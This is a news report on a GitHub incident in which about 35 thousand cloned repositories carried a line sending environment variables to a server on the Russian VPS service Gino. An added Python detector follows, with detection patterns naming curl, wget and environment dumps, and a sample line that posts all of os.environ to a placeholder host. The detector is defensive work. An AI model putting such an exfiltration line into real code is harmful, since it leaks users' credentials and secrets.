Anton Kuzmin, head of the CyberART Cyber Threat Prevention Center of Innostage Group, announced that in a recent hacker attack on GitHub, the attackers used Gino, a Russian virtual server (VPS) service.
“It is impossible to say exactly what the hackers' motives were for using the Russian VPS. But there are several options: either the attackers were attracted by the easy accessibility of this service, or they want to impersonate ‘Russian’ hackers,” said Kuzmin. The expert stressed that these explanations are only assumptions based on experience. The true reasons for using the Gino service are currently unknown to him.
The attack on GitHub became known on the night of August 3-4. As part of the incident, clones of various repositories, differing from the originals only in the presence of malicious code, were uploaded to the developer site.
“The attackers added a specific line to the code, as a result of which malware got into GitHub. When launched, it collects and sends the entire contents of the environment variable to the attacker’s server located on the Russian VPS ‘Gino’,” Kuzmin said, explaining the essence of the attack and the role of Russian infrastructure in it.
Thus, according to the expert, the hackers could have obtained a wide variety of official information, including logins and passwords of companies that used the copies. The incident affected about 35 thousand repositories. It has not been reported how many users connected to the fake repositories. As of now, GitHub has reported that all infected clones of legitimate projects have been removed.
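A defender's check for the pattern described above (a line that reads the whole environment and sends it out), as an added example that is not part of the original article and not code from the incident. The regular expressions, the line window, and the sample file with its host name are assumptions constructed here.

```python
import re

# Heuristics (assumptions of this example, not indicators from the incident):
# reads of the WHOLE environment, as opposed to a lookup of one named variable.
ENV_DUMP = re.compile(
    r"os\.environ\b(?!\s*\[|\.get\b)"          # Python: os.environ as a whole
    r"|process\.env\b(?!\s*\[|\.\w)"           # Node.js: process.env as a whole
    r"|\b(?:printenv|env)\s*\|"                # shell: env piped onward
    r"|\$\(\s*(?:printenv|env)\s*\)"           # shell: $(env) captured
)
# Outbound network sinks that a single injected line could use.
NET_SINK = re.compile(
    r"\bcurl\b|\bwget\b|requests\.(?:post|get|put)|urllib\.request|urlopen"
    r"|\bfetch\s*\(|https?\.request|socket\.connect"
)


def scan_source(text, window=2):
    """Return (line_number, line) for each whole-environment read that has a
    network sink on the same line or within `window` lines of it."""
    lines = text.splitlines()
    sinks = [i for i, line in enumerate(lines) if NET_SINK.search(line)]
    hits = []
    for i, line in enumerate(lines):
        if ENV_DUMP.search(line) and any(abs(i - s) <= window for s in sinks):
            hits.append((i + 1, line.strip()))
    return hits


# Constructed sample: a legitimate-looking file with one injected line.
# The host name is a placeholder, not a value from the incident.
SAMPLE = '''import os, requests
PORT = int(os.environ.get("PORT", "8080"))
home = os.environ["HOME"]
def start():
    requests.post("https://collector.example.invalid/c", data=dict(os.environ))
    return PORT
'''

if __name__ == "__main__":
    for number, line in scan_source(SAMPLE):
        print(f"line {number}: {line}")
```

Ordinary single-variable lookups (lines 2 and 3 of the sample) are not flagged; a hit is a prompt for manual review of the clone against its upstream, not proof of compromise.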